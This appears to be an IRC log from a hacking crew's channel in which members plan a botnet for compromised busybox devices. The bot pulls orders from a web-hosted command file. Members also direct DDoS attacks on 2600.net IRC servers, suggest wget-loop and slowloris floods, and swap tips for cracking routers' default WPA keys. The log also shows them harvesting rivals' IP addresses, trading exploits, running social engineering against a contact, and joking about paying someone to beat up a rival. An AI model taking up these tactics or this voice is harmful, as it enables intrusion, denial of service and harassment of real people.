Jun 01 12:46:13 <pwnsauce> ok! I have found an IRC bot in BASH I think Jun 01 12:46:27 * Neuron_ (Neuron@HA-3hr.345.a84vd3.IP) has joined #pure-e lite Jun 01 12:46:43 <Neuron_> lol gonna be one of those days were my connectio n hates me Jun 01 12:47:00 <pwnsauce> http://linux.softpedia.com/get/Communications/Ch at/BashBot-24097.shtml Jun 01 12:47:10 <pwnsauce> http://linux.softpedia.com/get/Programming/Libra ries/TheBOT-25778.shtml Jun 01 12:47:49 <pwnsauce> now IDK if they are any use Jun 01 12:47:50 <Neuron_> looking at it Jun 01 12:48:00 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 12:48:08 <Neuron_> don't think we want irc for this one Jun 01 12:48:16 <pwnsauce> aye, IRC was just an idea Jun 01 12:48:31 <lol> this is an old loader my friend wrote ages ago, it's for loading bots from a list of CISCO ip's http://pastebin.com/Y1E1QCgB Jun 01 12:48:52 <lol> we need something of the same effect Jun 01 12:49:50 <Neuron_> http://pastebin.com/uqh4qEzJ Jun 01 12:49:57 <Neuron_> this is the lame code im playing with right now Jun 01 12:50:16 <Neuron_> i hate bash scripting because of its annoying te ndencys so meh code sucks Jun 01 12:50:40 <joepie92> http://www.thinq.co.uk/2011/6/1/nato-report-thre atens-persecute-anonymous/ Jun 01 12:50:43 <joepie92> we be terrorists nao guise Jun 01 12:50:56 <Neuron_> were not anonymous :) Jun 01 12:52:01 <pwnsauce> brb :) ad Ill find Psyb0t src if I can Jun 01 12:52:23 <lol> "General Rapporteur Lord Jopling" Jun 01 12:52:28 <Neuron_> lol gl if you can that would be amazing Jun 01 12:52:32 <lol> tht has to be a troll/hack ala tupac? Jun 01 12:52:36 <lol> tht name can't be real xD Jun 01 12:52:46 <pwnsauce> LOL kayla - didnt see that Jun 01 12:52:58 <pwnsauce> and Neuron_ if its out there its MINE now Jun 01 12:52:59 <pwnsauce> brbz Jun 01 12:53:03 <lol> Rapporteur Jopling xD wtf Jun 01 12:53:06 <Neuron_> X Jun 01 12:53:07 <Neuron_> d Jun 01 13:04:19 <Neuron_> hmm linux dosen't allow multiple ping process's :/ Jun 01 13:04:59 <Sabu> wtf you taking about lo Jun 01 13:05:01 <Sabu> yes it does Jun 01 13:05:16 <Neuron_> ping the same host with x amoutn of ping process ? Jun 01 13:05:30 <Sabu> ping google.com & Jun 01 13:05:33 <Neuron_> so ping google.com -c 10& << calling that 30 tim es Jun 01 13:05:34 <Sabu> ping google.com & Jun 01 13:05:37 <Sabu> yes Jun 01 13:05:41 <Sabu> you can do that all day Jun 01 13:05:42 <Neuron_> results in one ping process using htop Jun 01 13:05:58 <Neuron_> *im using htop to view running process* Jun 01 13:06:26 <Neuron_> wait <.< derp Jun 01 13:07:46 <Neuron_> my for loop using 'seq 30' wasn't working Jun 01 13:11:39 <storm> hii Jun 01 13:11:44 <Neuron_> o/ storm Jun 01 13:12:34 <storm> ^.^ Jun 01 13:15:29 <Sabu> storm Jun 01 13:15:47 * Neuron_ has quit (Connection closed) Jun 01 13:16:08 * Neuron (Neuron@HA-3hr.345.a84vd3.IP) has joined #pure-el ite Jun 01 13:19:38 <pwnsauce> Neuron - got something inteeresting http://www.w

oodmann.com/forum/archive/index.php/t-12678.html Jun 01 13:19:41 <storm> yes sabu? Jun 01 13:19:48 <pwnsauce> its got a lnk to a bin Jun 01 13:19:56 <Neuron> pwnsauce: tried both link :P nothing Jun 01 13:20:08 <Topiary> hey storm you wanna raep collective? Jun 01 13:20:11 <Neuron> i couldn't even find a working binary of it :( Jun 01 13:22:05 <storm> yeah gimme a few Jun 01 13:22:39 <joepie92> regex for matching TOC entries from RFCs Jun 01 13:22:40 <joepie92> ([0-9]+\.)*[0-9]+[.]? [^.0-9]* Jun 01 13:22:52 <joepie92> if someone happens to need it Jun 01 13:22:52 <joepie92> :P Jun 01 13:24:05 <storm> just woke up Jun 01 13:24:14 <Topiary> heh Jun 01 13:24:25 <Sabu> storm Jun 01 13:24:31 <Sabu> get your boxes ready Jun 01 13:24:35 <Sabu> I want you to hit them for a bit Jun 01 13:25:29 <Sabu> you there niggy? Jun 01 13:27:25 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 13:29:59 <Sabu> storm hit their ircds again Jun 01 13:30:04 <Sabu> take out collection Jun 01 13:30:05 <Sabu> and madjack Jun 01 13:34:44 <joepie92> - madjack.2600.net -------------------------------- Users: 104 (19.6%) Jun 01 13:34:44 <joepie92> - `- blackbeard.2600.net ------------------------- Users: 0 (0.0%) Jun 01 13:34:44 <joepie92> - collective.2600.net --------------------- Users: 252 (47.5%) Jun 01 13:34:44 <joepie92> - djslocker.2600.net ---------------------- Users: 166 (31.3%) Jun 01 13:34:44 <joepie92> `- services.2600.net ----------------------- Users: 9 (1.7%) Jun 01 13:37:04 * Neuron (Neuron@HA-s9t.345.a84vd3.IP) has joined #pure-el ite Jun 01 13:37:08 <Neuron> back Jun 01 13:37:09 <Neuron> o/ Jun 01 13:37:14 <Sabu> jea Jun 01 13:38:03 <pwnsauce> Neuron - hows it allw orking out? Jun 01 13:38:06 <pwnsauce> Im thinking here Jun 01 13:38:09 <pwnsauce> have SOME ideas Jun 01 13:38:15 <pwnsauce> ok Jun 01 13:38:57 <Neuron> pwnsauce: we dont have alot to work with.. We ca n telnet,ssh,ping,wget << from the busybox's Jun 01 13:39:17 <Neuron> and i just tried to put my current work on the b usybox and errors so yay \o/ Jun 01 13:44:41 <pwnsauce> ok, we can do those Jun 01 13:44:43 <pwnsauce> perhaps Jun 01 13:44:45 <pwnsauce> IDEA Jun 01 13:44:50 <pwnsauce> wgetraeping Jun 01 13:45:07 <pwnsauce> wget and pipe putput to /dev/null (or equivaent) Jun 01 13:45:22 <pwnsauce> have that in a loop Jun 01 13:45:34 <pwnsauce> so it just... keeps on wgetting Jun 01 13:45:40 <pwnsauce> hmmm one sec brb had idea Jun 01 13:45:52 <Sabu> you can technically do slowloris attacks with wget Jun 01 13:46:51 <Neuron> pwnsauce: yeah we were thinking about that. the trick is just to get a simple cnc type system going Jun 01 13:48:57 <Neuron> im fighting with a bad subsitution error right o n the busybox side. On my side works fine so few moments Jun 01 13:51:53 <pwnsauce> ah ok Jun 01 13:52:01 <pwnsauce> what C&C we looking at? Jun 01 13:54:34 <Neuron> just a simple webserver style one

Jun 01 13:54:45 <Neuron> script pulls down a "command.txt" and parses it for commands Jun 01 13:54:56 <pwnsauce> aaah :) Jun 01 13:55:05 <pwnsauce> and then you "Update" command.txt Jun 01 13:55:10 <Neuron> yup Jun 01 13:55:11 <pwnsauce> via a web interface? Jun 01 13:55:21 <Neuron> not a web interface but im sure we could do that Jun 01 13:55:29 <pwnsauce> I have something here Jun 01 13:55:31 <Neuron> right now its just getting teh bash script to wo rk on busybox Jun 01 13:55:43 <storm> hey pwnsauce Jun 01 13:55:44 <storm> :] Jun 01 13:55:46 <pwnsauce> a remote admin tool that uses th same mechanism - updates a command.txt file Jun 01 13:55:49 <pwnsauce> hey Storm :D Jun 01 13:55:54 <storm> suppie Jun 01 13:56:05 <pwnsauce> nm, working on some stuff Jun 01 13:56:14 <pwnsauce> my *nix partition nuked tho :/ Jun 01 13:56:28 <storm> yuck Jun 01 13:58:37 * Sabu gives channel operator status to Neuron Topiary voo doo pwnsauce Jun 01 13:58:37 * Sabu gives channel operator status to lol Jun 01 13:58:39 <Sabu> thanks stor Jun 01 13:58:58 <storm> :p Jun 01 13:59:08 <storm> whatcha thanking me for Jun 01 13:59:11 <storm> seeing pings yet? Jun 01 13:59:59 <Neuron> sigh Jun 01 14:00:04 <Neuron> ./bot.sh: 60: [[: not found Jun 01 14:00:10 <Neuron> line 60 = done Jun 01 14:05:58 <[redacted]> back Jun 01 14:07:06 * also-cocks (pwnsauce@HA-q1a.9e1.pn6gun.IP) has joined #p ure-elite Jun 01 14:07:43 * pwnsauce has quit (Ping timeout: 121 seconds) Jun 01 14:07:50 * also-cocks is now known as pwnsauce Jun 01 14:07:56 * Neuron has quit (Connection closed) Jun 01 14:08:18 * Neuron (Neuron@HA-s9t.345.a84vd3.IP) has joined #pure-el ite Jun 01 14:08:42 <pwnsauce> my connection wernt Jun 01 14:10:08 * Neuron has quit (Quit: leaving) Jun 01 14:17:53 <[redacted]> do all of these little bastards Jun 01 14:17:57 <[redacted]> have a web directory? Jun 01 14:28:00 <pwnsauce> [redacted] - I dont knw... IIRC they have a web control interface of some kind Jun 01 14:28:28 <pwnsauce> Recursion! CANHAS SONYLULZ NAO PL0X! Jun 01 14:28:36 <pwnsauce> PM MEDIAFUCK LINKAGE! Jun 01 14:29:14 <[redacted]> then its simple Jun 01 14:29:17 <[redacted]> we write the bot in ASP Jun 01 14:29:18 <[redacted]> ??? Jun 01 14:29:19 <[redacted]> profit Jun 01 14:32:36 <joepie92> what's the quickest way to crack a WPA-PSK key Jun 01 14:32:46 <joepie92> or otherwise get access to a router using WPA-PS K Jun 01 14:32:46 <joepie92> ? Jun 01 14:32:53 * joepie92 never does that shit Jun 01 14:32:56 * trollpoll (trollpoll@HA-00r.11n.cc0br2.IP) has joined #p ure-elite Jun 01 14:33:04 <joepie92> ohai trollpoll Jun 01 14:33:08 * joepie92 repeats question Jun 01 14:33:12 <trollpoll> hi! Jun 01 14:33:12 <joepie92> <joepie92>what's the quickest way to crack a WPA

-PSK key Jun 01 14:33:12 <joepie92> <joepie92>or otherwise get access to a router us ing WPA-PSK Jun 01 14:33:32 <trollpoll> hm, rainbow tables? Jun 01 14:34:25 <joepie92> idk Jun 01 14:34:31 <joepie92> I have absolutely no experience with shit like t his Jun 01 14:34:36 <joepie92> also, the guy who is asking has 18kbps internet Jun 01 14:34:39 <trollpoll> but, if is this kind of routers pre-configured w ith WPA key obtained automatically using MAC & ESSID Jun 01 14:34:41 <joepie92> so rainbow tables might not be the best idea... Jun 01 14:34:44 <trollpoll> could be easy... Jun 01 14:34:50 <joepie92> ah Jun 01 14:34:50 <trollpoll> what kind of essid is it? Jun 01 14:34:51 <joepie92> thomsons Jun 01 14:34:53 <joepie92> 1 sec Jun 01 14:35:06 <trollpoll> in spain the jazztel_XXXX are quickly crackeable Jun 01 14:35:11 <trollpoll> and WLAN_XX too Jun 01 14:35:15 <trollpoll> and WLAN_XXXX too Jun 01 14:35:20 <joepie92> let me ask Jun 01 14:35:53 <trollpoll> all of them are calculable having the mac and th e essid, but if the user has already changed the wpa... it could be very hard to crack Jun 01 14:36:13 <pwnsauce> hmmmmm Jun 01 14:36:19 <pwnsauce> capture the handshake Jun 01 14:36:20 <trollpoll> anyway, i've tried to crack an wpa twice, and wi thout good results... Jun 01 14:36:27 <pwnsauce> upload to online cracker service Jun 01 14:36:41 <trollpoll> use gerix, is a very good tool to do so Jun 01 14:36:42 <joepie92> pwnsauce: got a link to a cracking service? Jun 01 14:37:12 <joepie92> Huawei_HG521 Jun 01 14:37:18 <joepie92> is the name Jun 01 14:37:19 <trollpoll> hur... Jun 01 14:37:29 <trollpoll> so it looks like a preconfigured name... Jun 01 14:37:33 <trollpoll> lets see... Jun 01 14:38:47 <trollpoll> hmm, hg521 is the model of the router Jun 01 14:39:11 <joepie92> ah Jun 01 14:39:14 <joepie92> :/ Jun 01 14:40:37 <trollpoll> i think that penetrate is an android tool to do this... (calculate the default wpa of some routers) Jun 01 14:41:10 <pwnsauce> joepie92 - ill find one Jun 01 14:41:17 <trollpoll> http://underdev.org/penetrate/ Jun 01 14:41:17 <pwnsauce> and I have penetrate but cant make it work Jun 01 14:41:39 <trollpoll> the thomson is calculable... Jun 01 14:41:53 <trollpoll> SpeedTouch, Thomson, Orange, DMax, BBox, Infinit um, Otenet, Cyta Jun 01 14:42:11 <trollpoll> do u have an android? :P Jun 01 14:42:24 <pwnsauce> I has... Jun 01 14:42:45 <joepie92> I don't Jun 01 14:42:46 <joepie92> lol Jun 01 14:43:28 <trollpoll> (i do have one too)... Jun 01 14:43:42 <trollpoll> do you use tor (orbot) for android pwnsauce ? Jun 01 14:43:48 <trollpoll> is better than expected... Jun 01 14:50:24 <joepie92> hey Jun 01 14:50:24 <joepie92> guys Jun 01 14:50:27 <joepie92> if anyone is interested Jun 01 14:50:31 <joepie92> in the nonynews guy Jun 01 14:50:35 <joepie92> who was posting shit on wikia Jun 01 14:50:35 <joepie92> - Whois list of nonyNews Jun 01 14:50:35 <joepie92> - Realname: nonyNews

Jun 01 14:50:35 <joepie92> - Hostmask: nonyNews!~anon@server106963.santrex. net * Jun 01 14:50:35 <joepie92> - nonyNews is on: #lulzsec Jun 01 14:50:35 <joepie92> - Server: collective.2600.net (Arghhh, Scourge o f the seven seas!) Jun 01 14:50:35 <joepie92> - End of /WHOIS list. Jun 01 14:50:40 <joepie92> :> Jun 01 14:50:47 <joepie92> @ Topiary Jun 01 14:51:10 <Topiary> indeed Jun 01 14:51:28 <joepie92> fucking idiots not realizing your shit doesn't g et masked on 2600... Jun 01 14:51:35 * joepie92 does anonops ip match Jun 01 14:51:57 <pwnsauce> trollpoll - I dont use my android to access web Jun 01 14:52:13 <pwnsauce> I only use to breal WEP key on Eircom Jun 01 14:52:18 <Topiary> joepie92, can I make them realize we have all th eir IPs? Jun 01 14:52:30 <joepie92> mmmm Jun 01 14:52:33 <joepie92> let me see the userlist first Jun 01 14:52:38 <joepie92> to see if I recognize any fishy names Jun 01 14:54:39 <joepie92> oops :3 Jun 01 14:54:54 <Topiary> you started it ! Jun 01 14:54:57 <Topiary> heh Jun 01 14:56:03 <joepie92> meh Jun 01 14:56:10 <joepie92> I was feeling a bit juvenile Jun 01 14:56:11 <joepie92> :D Jun 01 14:57:38 <joepie92> <Awinee>joepie91 has more skill then you Jun 01 14:57:39 <joepie92> lold Jun 01 14:57:40 <joepie92> lold hard Jun 01 14:58:04 <joepie92> because whoising someone Jun 01 14:58:06 <joepie92> is in any way a skill Jun 01 14:58:06 <joepie92> lol Jun 01 14:59:19 <joepie92> <TheJackal>holy shit this asshole never shuts up Jun 01 14:59:20 <joepie92> <TheJackal>it was bad enough seeing the trash yo u spill on twitter Awinee, now you come here? Jun 01 14:59:21 <joepie92> lolol Jun 01 14:59:55 <trollpoll> where are you? at 2600? Jun 01 15:00:09 <joepie92> ya Jun 01 15:00:10 <joepie92> lol Jun 01 15:00:20 <trollpoll> just trolling? or doing something? Jun 01 15:01:01 <joepie92> GOD Jun 01 15:01:02 <joepie92> I FUCKING HATE Jun 01 15:01:03 <joepie92> THESE Jun 01 15:01:06 <joepie92> WIBYA TOOLBARS Jun 01 15:01:11 <joepie92> seriously Jun 01 15:01:14 <joepie92> I try to read a blog Jun 01 15:01:16 <joepie92> and I get 23512351235 popups Jun 01 15:01:17 <joepie92> saying Jun 01 15:01:20 <joepie92> you can tweet this Jun 01 15:01:22 <joepie92> you can FB like this Jun 01 15:01:23 <joepie92> you can blah Jun 01 15:01:24 <joepie92> you can derp Jun 01 15:01:26 <joepie92> you can herp Jun 01 15:01:29 <joepie92> click here to this Jun 01 15:01:31 <joepie92> click there to that Jun 01 15:01:40 <joepie92> and I'm like gtfo with that toolbar shit, I just want to read the fucking article Jun 01 15:03:44 <joepie92> example Jun 01 15:03:44 <joepie92> http://draugnavz.repofter.com/blog/ Jun 01 15:14:08 <joepie92> http://buypoe.com/technology/12837-fox-news-hack ed-anonymous.html

Jun 01 15:14:09 <joepie92> wat. Jun 01 15:16:45 <trollpoll> where is this video?? Jun 01 15:19:18 * Neuron (Neuron@HA-icg.62t.o0m95d.IP) has joined #pure-el ite Jun 01 15:19:26 <Neuron> hey o/ Jun 01 15:19:53 <pwnsauce> hey :) Jun 01 15:21:53 <Topiary> <Awinee> Oh shit, Whirlpool is here Jun 01 15:21:54 <Topiary> <Awinee> lets put the channel to +m and unvoice him so he can't speak :D Jun 01 15:21:54 <Topiary> <Awinee> LULZ Jun 01 15:21:54 <Topiary> * Awinee gives voice to Power2All Jun 01 15:21:54 <Topiary> * Awinee sets ban on *!*root@*.static-host.net Jun 01 15:21:54 <Topiary> * You have been kicked from #awinee by Awinee (c ome back when you got the balls to talk to me in private) Jun 01 15:22:00 <Topiary> ^ a stalker Jun 01 15:22:04 <pwnsauce> lmao Jun 01 15:22:06 <Topiary> who claims to be "within us" Jun 01 15:22:10 <Topiary> welp, you in here Awinee? Jun 01 15:22:19 <pwnsauce> lol no Jun 01 15:22:25 <Topiary> didn't think so ^_^ Jun 01 15:22:30 <pwnsauce> xD Jun 01 15:23:32 <pwnsauce> root@awinees-mom:~# grep Awinees Birth;rm -f * Jun 01 15:23:46 <pwnsauce> something liek that Jun 01 15:23:57 <pwnsauce> im too tired to parse correctly x( Jun 01 15:25:09 <Topiary> pretty sure we should pay someone to beat up Awi nee IRL Jun 01 15:25:26 <Topiary> maybe a 12-year-old girl Jun 01 15:25:30 <Topiary> she could easily manage Jun 01 15:25:51 * Neuron has quit (Connection closed) Jun 01 15:26:21 * Neuron (Neuron@HA-5ve.d61.5kgcfl.IP) has joined #pure-el ite Jun 01 15:29:23 <Neuron> lol you one? Jun 01 15:37:21 <pwnsauce> Ill ask Rebeccca Black Jun 01 15:38:40 <Neuron> pwnsauce: those busybox's have a web directory. On port 80 Jun 01 15:39:00 <Neuron> Soo gotta create asp bot Jun 01 15:39:43 <pwnsauce> :D Jun 01 15:39:48 <pwnsauce> they no run PHP? Jun 01 15:39:52 <pwnsauce> I has PHP bot somewhere Jun 01 15:39:59 <Neuron> no php asp :E Jun 01 15:40:11 <pwnsauce> gey Jun 01 15:40:12 <pwnsauce> hmmm Jun 01 15:40:19 <pwnsauce> if I give you ASP shell and PHP bot Jun 01 15:40:32 <pwnsauce> you can reverse engineer them or something Jun 01 15:40:44 <pwnsauce> you know... do the thing Jun 01 15:40:46 <Neuron> we have a php bot Jun 01 15:40:51 <Neuron> need asp bot Jun 01 15:41:23 <pwnsauce> oh *facepalms several times* sorry im a bit sill y Jun 01 15:42:10 <Neuron> its fine ive said some retarted shit today Jun 01 15:42:55 <pwnsauce> ah ok Jun 01 15:43:12 <pwnsauce> im a bit muddled cos my *nix partitions fucked a nd using wondows is difficult Jun 01 15:43:17 <pwnsauce> WHERS MY FUCKING TERMINAL Jun 01 15:43:30 <Neuron> XD Jun 01 15:43:37 <Neuron> click start->run type cmd Jun 01 15:43:48 <pwnsauce> but cmd => FAIL terminal :( Jun 01 15:44:22 <pwnsauce> i wants my root@yore-ma:~# Jun 01 15:44:24 <pwnsauce> not this Jun 01 15:44:46 <pwnsauce> C:\Users\root>

Jun 01 15:45:13 <pwnsauce> (my admin acc is called root on Doze also :D ) Jun 01 15:45:14 <Neuron> lol Jun 01 15:45:45 <pwnsauce> OFC I have an acc called "going@~yore-ma:~$" Jun 01 15:45:51 <pwnsauce> cos its goin at yer ma ! Jun 01 15:49:18 <Neuron> lol Jun 01 15:50:24 <pwnsauce> hmmmmm. time to backdoor me some peoples Jun 01 15:50:41 <Topiary> Fox> [12:34:56] <Fox> You got a messenger? I'd b e happy to toss exploits and business back and forth. Jun 01 15:50:46 <Topiary> we got people offering us exploits Jun 01 15:51:03 <Neuron> very nice Jun 01 15:51:17 <Neuron> Topiary: is he ligit? Jun 01 15:51:44 <Topiary> he seems to know his shit, but he joined our cha n on 2600 randomly (assuming from twitter) Jun 01 15:51:49 <Topiary> so... he's legit Jun 01 15:51:50 <Topiary> but Jun 01 15:51:52 <Topiary> not sure if we can trust him Jun 01 15:52:12 <Neuron> well we can do business just don't let him in he re? Jun 01 15:52:22 <Topiary> oh no no no definitely not coming in here Jun 01 15:52:26 <Topiary> we can set up a neutral chan on Unreal Jun 01 15:52:33 <Neuron> sounds good Jun 01 15:52:50 <Topiary> this shit is sealed tight unless Sabu says the w ords "100% trusted" Jun 01 15:52:51 <Neuron> wouldn't be a bad idea to get some contacts Jun 01 15:54:05 <pwnsauce> topiary - wht IRCd? Jun 01 15:54:09 <pwnsauce> or rather Jun 01 15:54:15 <pwnsauce> if they hand you exploits Jun 01 15:54:17 <pwnsauce> send to me Jun 01 15:54:24 <pwnsauce> some fags edit them or give fakes Jun 01 15:54:32 <pwnsauce> that really just rm -rf you : Jun 01 15:54:34 <Neuron> aye i can read exploits as well Jun 01 15:54:39 <Neuron> o/ Jun 01 15:54:55 <pwnsauce> aye - me Neuron and kayla can "check" them Jun 01 15:55:01 <joepie92> I wouldn't assume anyone here would run any shit without checking what it does Jun 01 15:55:02 <joepie92> tbh Jun 01 15:55:03 <joepie92> lol Jun 01 15:55:17 <Topiary> well guys put on fake names, don't give him pers onal info, get onto irc.unrealirc.net (or .com can't remember), do /mode <you> + T Jun 01 15:55:23 <Topiary> then we can all talk to these fags Jun 01 15:55:26 <pwnsauce> joepie - I have been nailed by a few things :( Jun 01 15:55:27 <Topiary> as a personal business channel Jun 01 15:55:33 <joepie92> pwnsauce: ? Jun 01 15:56:52 <pwnsauce> joepie - fake OpenSSH exploit :( Jun 01 15:56:56 <pwnsauce> and some backdoored shit Jun 01 15:57:00 <joepie92> ahhh Jun 01 15:57:08 <joepie92> never run shit unless you read it Jun 01 15:57:18 * Neuron_ (Neuron@HA-1rf.d61.5kgcfl.IP) has joined #pure-e lite Jun 01 15:57:21 <pwnsauce> aye, I was just SO excited Jun 01 15:57:28 <pwnsauce> openSSH 5.* 0day Jun 01 15:57:28 <Neuron_> back Jun 01 15:57:30 <Neuron_> what did i miss Jun 01 15:57:34 <joepie92> lol Jun 01 15:57:44 <Neuron_> lol hes selling one? Jun 01 15:57:47 <pwnsauce> No Jun 01 15:57:51 <pwnsauce> I was saying Jun 01 15:57:55 <pwnsauce> I got a fake sploit for it Jun 01 15:57:58 <pwnsauce> and it rm ed me

Jun 01 15:57:59 <Neuron_> oo :( Jun 01 15:58:04 <Neuron_> sad day Jun 01 15:58:24 <Topiary> sorry that's irc.unrealircd.org Jun 01 15:58:51 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 15:59:18 <Topiary> okay channel is called ###trade Jun 01 15:59:20 <Neuron_> what channel Jun 01 15:59:39 <trollpoll> guys, if i were you, i would not trust anyone of this #lulzsec chan Jun 01 15:59:47 <Topiary> I trust none of them Jun 01 15:59:53 <Topiary> we can reverse SE this guy, just don't give anyt hing away Jun 01 15:59:57 <Neuron_> rgr Jun 01 16:00:08 <Topiary> if he's Jesterfag we can use our spies to report Jun 01 16:00:56 * Topiary facepalms and LOLs at you guys Jun 01 16:00:59 <Topiary> >Neuron joins Jun 01 16:01:03 <Topiary> >also-cock (pwnsauce@) Jun 01 16:01:03 <Neuron_> im fine with it :P Jun 01 16:01:16 <Neuron_> i really don't mind my name being that :P Jun 01 16:02:06 <trollpoll> joepie92, you always use the same nick? Jun 01 16:02:13 <joepie92> well Jun 01 16:02:18 <trollpoll> (well 91, 92...) Jun 01 16:02:18 * joepie92 is now known as joepie91 Jun 01 16:02:18 <joepie91> is my actual nick Jun 01 16:02:18 <trollpoll> xD Jun 01 16:02:19 <joepie91> but Jun 01 16:02:21 <joepie91> if I disconnect Jun 01 16:02:24 <joepie91> and joepie91 is still here Jun 01 16:02:31 <joepie91> my client increments my nick Jun 01 16:02:32 <joepie91> idk why Jun 01 16:02:38 <joepie91> thus joepie91 Jun 01 16:02:38 <Topiary> well just make sure we never give any link to An onymous/ourselves when talking to contacts on the IRC Jun 01 16:02:43 <joepie91> I've hit shit like joepie184 before Jun 01 16:02:43 <joepie91> lol Jun 01 16:02:44 <trollpoll> i mean, anywhere you go, you use the same nick? Jun 01 16:02:47 <joepie91> ya Jun 01 16:02:51 <trollpoll> of course Jun 01 16:03:06 <Neuron_> Aye Topiary Jun 01 16:03:15 <Topiary> okay pwnsauce you're gonna have to pretend to ju st be another trading partner Jun 01 16:03:18 <Topiary> as pwnsauce == Anonymous Jun 01 16:03:22 <joepie91> trollpoll: why? :P Jun 01 16:03:45 <trollpoll> nothing, cos if i were you i would feel unsecure using the same nick around Jun 01 16:04:14 <pwnsauce> k Jun 01 16:04:57 <Neuron_> if i randomly drop its because my connection hat es me Jun 01 16:06:40 <joepie91> trollpoll: I literally have pretty much nothing to hide Jun 01 16:06:43 <storm> hi Jun 01 16:06:45 <joepie91> so how would I be insecure? :P Jun 01 16:06:51 <Topiary> I hope this is a Jesterfag, we can inject some f ake d0x Jun 01 16:07:02 <pwnsauce> I hope not Jun 01 16:07:07 <pwnsauce> wants free exploits Jun 01 16:07:13 <Neuron_> lol Jun 01 16:07:23 <trollpoll> well, just being here, is something to hide... Jun 01 16:07:34 <trollpoll> (in my opinion) Jun 01 16:07:43 <storm> good opinion Jun 01 16:07:46 <Neuron_> lol

Jun 01 16:08:20 <Neuron_> if hes a jesterfag it would be the first time my nick is put on the map Jun 01 16:08:25 <Topiary> there's gold here, he knows his shit Jun 01 16:08:29 <Topiary> we can get something out of him Jun 01 16:08:39 <Sabu> what you guys are doing? Jun 01 16:08:45 <storm> ]just woke up Jun 01 16:08:55 <Topiary> found someone in our #lulzsec chan that knows hi s shit, got talking to him Jun 01 16:08:57 <trollpoll> but, hey, i dont have nothing with this, i mean, its okey, i just where thinking on our anonymity... Jun 01 16:09:03 <Topiary> invited him to a neutral chan where we're feelin g him out Jun 01 16:09:05 <Topiary> he's probably aspy Jun 01 16:09:22 <Topiary> and if he is, then we can throw them off course Jun 01 16:09:24 <joepie91> trollpoll: being in an irc channel is not illega l :D Jun 01 16:09:25 <Topiary> if he isn't, free exploits Jun 01 16:09:29 <Topiary> nobody fuck up and we win Jun 01 16:09:31 <Topiary> ^___^ Jun 01 16:09:33 <Neuron_> rgr Jun 01 16:09:43 <Neuron_> i won't say anything other then to direct the co nvo Jun 01 16:09:49 <trollpoll> i know :) but, i dont want to be incocent, i wan t to look like :D Jun 01 16:09:57 <joepie91> lol Jun 01 16:10:04 <Sabu> good shit Jun 01 16:10:06 <joepie91> there's a reason I typically stay clear of blata ntly illegal stuff :P Jun 01 16:10:12 <Sabu> heres the funny part Jun 01 16:10:21 <trollpoll> hehe, nice ;) Jun 01 16:10:27 <Sabu> one sec Jun 01 16:11:01 <Neuron_> Sabu: do you want irc.unrealircd.org Jun 01 16:11:05 <Neuron_> ###trade Jun 01 16:11:14 <Sabu> ok sec Jun 01 16:11:59 <Topiary> make sure to Anon it up, also +T yourself (no CT CP) Jun 01 16:12:05 <Topiary> Unreal <3 for that mode Jun 01 16:12:28 <Topiary> OH LOL you're Brazil Jun 01 16:12:40 <Neuron_> o god XD Jun 01 16:12:59 <Topiary> well everyone gather round and watch Sabu go ins ane Jun 01 16:12:59 <Neuron_> Wai twhats going on? Jun 01 16:13:03 <Topiary> with his Brazil impression Jun 01 16:13:16 <Neuron_> o god Jun 01 16:13:41 <trollpoll> from brazil? im gonna enter the chan (ill be qui et) Jun 01 16:13:52 <Topiary> <Brazil> HEUHEAUEHAUHAUEHAHEAUEHUHheuheushHUAHUe huuhuUEUue Jun 01 16:13:55 <Neuron_> lmfao Jun 01 16:13:55 <Topiary> cracks me up man Jun 01 16:13:56 <[redacted]> LOL WUT Jun 01 16:14:03 <Topiary> he was doing this for like an hour in lulzsec Jun 01 16:14:04 <[redacted]> you got rm'd by a fake OpenSSH exploit? Jun 01 16:14:21 <pwnsauce> [redacted] - yes Jun 01 16:14:27 <pwnsauce> and a fake IIS 6 overflow Jun 01 16:14:30 <pwnsauce> a year ago Jun 01 16:14:32 <Neuron_> owch Jun 01 16:14:34 <[redacted]> Lulzsec - The hacker elite Jun 01 16:14:49 <Topiary> that's okay I became part of a Japanese botnet o nce

Jun 01 16:14:50 <Sabu> topiary Jun 01 16:14:54 <Sabu> that guy that gave me senate Jun 01 16:14:58 <Sabu> is the guy that owned g00ns Jun 01 16:14:59 <Sabu> ROFL Jun 01 16:15:03 <Topiary> fucking awesome Jun 01 16:15:25 <Neuron_> why is sabu acting like brazil again? Jun 01 16:15:38 <Topiary> watch and see Jun 01 16:15:44 <Topiary> Fox is gonna spill all the juice Jun 01 16:15:48 <Neuron_> lul Jun 01 16:17:43 <Sabu> I just Jun 01 16:17:45 <Sabu> socialed Jun 01 16:17:45 <Sabu> him Jun 01 16:17:46 <Sabu> hard. Jun 01 16:17:52 * Neuron_ calps Jun 01 16:18:11 <Neuron_> lol suddenly not typing in all acps XD Jun 01 16:18:20 <Sabu> ;) Jun 01 16:19:07 <Topiary> your Brazil social game cracks me up Jun 01 16:19:11 <Topiary> bravo Jun 01 16:19:15 <Sabu> ;) Jun 01 16:19:26 <Topiary> nobody can shut their mouths with that fucking H ehuhehuheahauHAUHUhauhUAHUEHE Jun 01 16:19:30 <Topiary> on your ass every 2 seconds Jun 01 16:19:31 <Sabu> hahahahhaha Jun 01 16:19:34 <Neuron_> its so annoying XE Jun 01 16:19:45 <joepie91> http://www.wired.com/threatlevel/2011/06/silkroa d/ Jun 01 16:19:47 <Sabu> its so true too have oyu guys ever talked to a real hard core brazillian hacker? Jun 01 16:19:51 <Sabu> they are out of control .... Jun 01 16:19:58 <Neuron_> nope Jun 01 16:21:37 <Sabu> <Brazil> Fox, a gentlemen never tells Jun 01 16:21:37 <Sabu> <@Fox> AHHH I LOVE THAT ANSWER Jun 01 16:21:37 <Sabu> <Brazil> but if you work with us Jun 01 16:21:37 <Sabu> <@Fox> I literally smiled Jun 01 16:21:38 <Sabu> <@Fox> rofl Jun 01 16:21:40 <Sabu> HAHAHAHAHHAHHHAHAHAHHZHAHZHHH Jun 01 16:22:06 <trollpoll> lol Jun 01 16:22:23 <Neuron_> Sabu you are a god Jun 01 16:22:24 <Neuron_> :P Jun 01 16:22:46 <Sabu> thanks sir Jun 01 16:23:01 <Neuron_> is Fox trustable? Jun 01 16:23:02 <pwnsauce> Sabu - as far as he knows im some random Jun 01 16:23:04 <Sabu> consider yourselves lucky no one really gets to see me w ork in action Jun 01 16:23:14 <Sabu> no one is trustable outside out crew Jun 01 16:23:17 <Sabu> 